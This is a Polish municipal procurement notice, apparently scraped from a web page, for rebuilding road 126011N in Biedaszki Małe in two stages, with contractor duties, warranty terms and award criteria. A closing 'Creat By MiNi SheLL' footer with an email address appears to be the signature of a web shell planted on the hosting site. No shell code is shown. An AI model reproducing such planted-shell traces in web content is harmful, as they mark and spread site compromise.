<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przebudowa drogi gminnej 126011N w miejscowości Biedaszki Małe :

 etap I - działka 123/1, obręb Biedaszki, Gmina Kętrzyn,
 odcinek drogi objęty zamówieniem:  od km 0+000,00  do km 0+693,40.        

        CPV: 
               45100000-8 - Przygotowanie terenu pod budowę,
               45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne,
               45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii 
                                      lądowej i wodnej,
               45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei;
                                     wyrównywanie terenu,
               45233220-7  Roboty  w zakresie nawierzchni dróg
              
2. Zakres rzeczowy robót budowlanych  zawierają załączone formularze  cenowe-kosztorysy ofertowe. Wykonawca zobowiązany jest załączyć do formularza oferty  formularz cenowy - kosztorys ofertowy dotyczący części zamówienia, na którą/które składana jest oferta, uzupełniony o ceny jednostkowe, wartości robót oraz wartość całkowitą brutto,  stanowiącą cenę ofertową na daną część zamówienia.  Przy obliczaniu ceny ofertowej danej części zamówienia Wykonawca zobowiązany jest  uwzględnić wszystkie koszty związane z realizacją przedmiotu umowy zgodnie  z warunkami SIWZ (wraz z załączni-
kami).

3. Wymagania techniczne i jakościowe dotyczące przedmiotu zamówienia określone zostały w  dokumentacji budowlano-wykonawczej (projekty) oraz w specyfikacjach technicznych, stanowiących załączniki do  SIWZ.

    W przypadku rozbieżności w opisie zamówienia  należy stosować następującą kolejność  interpretacji (ważności) dokumentów opisujących zamówienie  :
    1)  SIWZ ze wzorem umowy i ewentualnymi wyjaśnieniami zamawiającego,
    2) przedmiar robót,
    3) dokumentacja budowlano-wykonawcza (projekty),
    4) specyfikacje techniczne .

4. Zamówienie zostanie zrealizowane z materiałów wykonawcy.
Jeżeli dokumenty opisujące przedmiot zamówienia, wskazują dla niektórych materiałów  lub urządzeń znaki towarowe lub pochodzenie, zamawiający dopuszcza składanie ofert  równoważnych, tj. z zastosowaniem  materiałów i urządzeń innych producentów , pod warunkiem zapewnienia nie gorszych parametrów technicznych . Wykazanie, iż  zamienione materiały lub urządzenia posiadają nie gorsze parametry techniczne jak te w dokumentacji przetargowej, będzie należało do obowiązków wykonawcy.

5. Do obowiązków wykonawcy, w ramach przysługującego mu wynagrodzenia, należy również  :
   1) wykonanie  i  utrzymanie  niezbędnego zaplecza,  
   2) opracowanie projektu  organizacji  ruchu  na  czas  prowadzenia  robót    objętych  niniejszym zamówieniem  zgodnie z  Ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu  drogowym (tekst jedn. Dz.U. 2003 r. Nr  58  poz.515  ze  zm.),  Rozporządzeniem  Ministra  Infrastruktury  z  dnia  3  lipca  w  sprawie  szczegółowych warunków  technicznych  dla  znaków  i  sygnałów  drogowych  oraz  urządzeń  bezpieczeństwa  ruchu  drogowego i  warunków  ich  umieszczania  na  drogach  (Dz.U.    z  2003  r.   Nr  220,  poz.  2181)  oraz  Rozporządzeniem  Ministra Infrastruktury  z  dnia 23  września  w  sprawie  szczegółowych  warunków  zarządzania  ruchem  na  drogach 
oraz wykonywania nadzoru nad tym zarządzaniem (Dz.U. z 2003 r. Nr 177 poz.1729), 
   3)  przedstawienia  Zamawiającemu  w  ciągu  14  dni  od  podpisania  umowy  harmonogramu  rzeczowo-finansowego robót, celem jego uzgodnienia; w przypadku braku uzgodnienia harmonogramu przez Zamawiającego Wykonawca w terminie 7 dni od otrzymania informacji o braku uzgodnienia harmonogramu przedłoży nowy harmonogram uwzględniający uwagi Zamawiającego, 
   4) oznakowania  miejsca  robót    zgodnie  z  zatwierdzonym  projektem  organizacji  ruchu i  utrzymywania  tego oznakowania w należytym stanie przez cały czas robót,  
   5) obsługa geodezyjna robót, w tym inwentaryzacja geodezyjna powykonawcza,
   6) zgłoszenie i uzgodnienie z dysponentami urządzeń obcych znajdujących się w pasie drogowym zasad prowadzenia robót,
   7) zabezpieczenie instalacji i urządzeń na terenie robót i w jego bezpośrednim otoczeniu przed ich zniszczeniem lub uszkodzeniem w trakcie wykonywania robót, 
   8) informowanie Zamawiającego lub osoby przez niego upoważnionej o terminie wykonania robót ulegających zakryciu,
  9) zapewnienie ciągłości ruchu pojazdów  i  pieszych w czasie  prowadzonych robót łącznie z jego właściwą organizacją; roboty związane z  przebudową  drogi będą  wykonywane  co  najwyżej  przy  częściowym  zamknięciu  tylko  jednego pasa ruchu,
  10)  przekazanie Zamawiającemu na jego żądanie materiałów rozbiórkowych, a w przeciwnym razie  zagospodarowanie ich we własnym zakresie, a w razie konieczności również zutylizowanie,
  11) uporządkowanie, po zakończeniu prac, terenu robót oraz innych wykorzystywanych przez wykonawcę terenów,
  12) usunięcie na swój koszt wad i usterek stwierdzonych w okresie rękojmi za wady i w okresie gwarancji jakości.

6.  Zamówienie będzie realizowane na podstawie zgłoszenia robót budowlanych dokonanegoprzez zamawiającego.

7. Wymagany okres gwarancji dla  przedmiotu zamówienia - 5 lat od odbioru końcowego danej części zamówienia

8. Dla każdego etapu Zamawiający przewiduje  udzielenie zamówień uzupełniających, o których mowa w art.67ust.1 pkt 6 ustawy, o łącznej wielkości nie większej niż 50%  wartości zamówienia podstawowego, zgodnych z przedmiotem zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień . 
     Wykonawcy nie przysługuje roszczenie o udzielenie zamówienia uzupełniającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.00.00-8, 45.10.00.00-8, 45.11.00.00-1, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.98</li>
<li>2. Termin realizacji - 0.02</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Etap II - działka 123/2, obręb Biedaszki, Gmina Kętrzyn..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przebudowa drogi gminnej 126011N w miejscowości Biedaszki Małe:                                                                                                                                            
 etap II - działka 123/2, obręb Biedaszki, Gmina Kętrzyn,
 odcinek drogi objęty zamówieniem:  od km 0+006  do km 0+647.    

           CPV: 
               45100000-8 - Przygotowanie terenu pod budowę,
               45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych;  roboty ziemne,
               45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów  budowlanych lub ich części oraz roboty w zakresie inżynierii 
                                 lądowej i wodnej,
               45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei;
                                     wyrównywanie terenu,
               45233220-7  Roboty  w zakresie nawierzchni dróg

2. Zakres rzeczowy robót budowlanych  zawierają załączone formularze  cenowe-kosztorysy ofertowe. Wykonawca zobowiązany jest załączyć do formularza oferty  formularz cenowy - kosztorys ofertowy dotyczący części zamówienia, na którą/które składana jest oferta, uzupełniony o ceny jednostkowe, wartości robót oraz wartość całkowitą brutto,   stanowiącą cenę ofertową na daną część zamówienia.  Przy obliczaniu ceny ofertowej danej części zamówienia Wykonawca zobowiązany jest  uwzględnić wszystkie koszty związane z realizacją przedmiotu umowy zgodnie  z warunkami SIWZ (wraz z załączni-
    kami).

3. Wymagania techniczne i jakościowe dotyczące przedmiotu zamówienia określone zostały w  dokumentacji budowlano-wykonawczej (projekty) oraz w specyfikacjach technicznych, stanowiących załączniki do SIWZ.

    W przypadku rozbieżności w opisie zamówienia  należy stosować następującą kolejność  interpretacji (ważności) dokumentów opisujących zamówienie  :
    1) SIWZ ze wzorem umowy i ewentualnymi wyjaśnieniami zamawiającego,
    2) przedmiar robót,
    3) dokumentacja budowlano-wykonawcza (projekty),
    4) specyfikacje techniczne .

4. Zamówienie zostanie zrealizowane z materiałów wykonawcy.
Jeżeli dokumenty opisujące przedmiot zamówienia, wskazują dla niektórych materiałów lub urządzeń znaki towarowe lub pochodzenie, zamawiający dopuszcza składanie ofert równoważnych, tj. z zastosowaniem  materiałów i urządzeń innych producentów , pod warunkiem zapewnienia nie gorszych parametrów technicznych . Wykazanie, iż  zamienione materiały lub urządzenia posiadają nie gorsze parametry techniczne jak te w dokumentacji przetargowej, będzie należało do obowiązków wykonawcy.

5. Do obowiązków wykonawcy, w ramach przysługującego mu wynagrodzenia, należy również  :

   1) wykonanie  i  utrzymanie  niezbędnego zaplecza,  
   2) opracowanie projektu  organizacji  ruchu  na  czas  prowadzenia  robót    objętych  niniejszym zamówieniem  zgodnie z  Ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tekst jedn. Dz.U. 2003 r. Nr  58  poz.515  ze  zm.),  Rozporządzeniem  Ministra  Infrastruktury  z  dnia  3  lipca  w  sprawie  szczegółowych warunków  technicznych  dla  znaków  i  sygnałów  drogowych  oraz  urządzeń  bezpieczeństwa  ruchu  drogowego i  warunków  ich  umieszczania  na  drogach  (Dz.U.    z  2003  r.   Nr  220,  poz.  2181)  oraz  Rozporządzeniem  Ministra Infrastruktury  z  dnia 23  września  w  sprawie  szczegółowych  warunków  zarządzania  ruchem  na  drogach  oraz wykonywania nadzoru nad tym zarządzaniem (Dz.U. z 2003 r. Nr 177 poz.1729), 
   3)  przedstawienia  Zamawiającemu  w  ciągu  14  dni  od  podpisania  umowy  harmonogramu  rzeczowo-finansowego robót, celem jego uzgodnienia; w przypadku braku  uzgodnienia harmonogramu przez Zamawiającego Wykonawca w terminie 7 dni od otrzymania informacji o braku uzgodnienia harmonogramu przedłoży nowy harmonogram uwzględniający uwagi Zamawiającego, 
   4) oznakowania  miejsca  robót    zgodnie  z  zatwierdzonym  projektem  organizacji  ruchu i  utrzymywania  tego oznakowania w należytym stanie przez cały czas robót,  
   5) obsługa geodezyjna robót, w tym inwentaryzacja geodezyjna powykonawcza,
   6) zgłoszenie i uzgodnienie z dysponentami urządzeń obcych znajdujących się w pasie drogowym zasad prowadzenia robót,
   7) zabezpieczenie instalacji i urządzeń na terenie robót i w jego bezpośrednim otoczeniu  przed ich zniszczeniem lub uszkodzeniem w trakcie wykonywania robót, 
   8) informowanie Zamawiającego lub osoby przez niego upoważnionej o terminie wykonania robót ulegających zakryciu,
  9) zapewnienie ciągłości ruchu pojazdów  i  pieszych w czasie  prowadzonych robót  łącznie z jego właściwą organizacją; roboty związane z  przebudową  drogi będą  wykonywane  co  najwyżej  przy  częściowym  zamknięciu  tylko  jednego pasa ruchu,
  10)  przekazanie Zamawiającemu na jego żądanie materiałów rozbiórkowych, a w przeciwnym razie  zagospodarowanie ich we własnym zakresie, a w razie konieczności również zutylizowanie,
  11) uporządkowanie, po zakończeniu prac, terenu robót oraz innych wykorzystywanych przez wykonawcę terenów,
  12) usunięcie na swój koszt wad i usterek stwierdzonych w okresie rękojmi za wady  i w okresie gwarancji jakości.

6.  Zamówienie będzie realizowane na podstawie zgłoszenia robót budowlanych dokonanego przez zamawiającego.

7. Wymagany okres gwarancji dla  przedmiotu zamówienia - 5 lat od odbioru końcowego danej części zamówienia

8. Dla każdego etapu Zamawiający przewiduje  udzielenie zamówień uzupełniających, o których mowa w art.67ust.1 pkt 6 ustawy, o łącznej wielkości nie większej niż 50% wartości zamówienia podstawowego, zgodnych z przedmiotem zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień . 
     Wykonawcy nie przysługuje roszczenie o udzielenie zamówienia uzupełniającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.00.00-8, 45.10.00.00-8, 45.11.00.00-1, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.98</li>
<li>2. Termin realizacji - 0.02</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com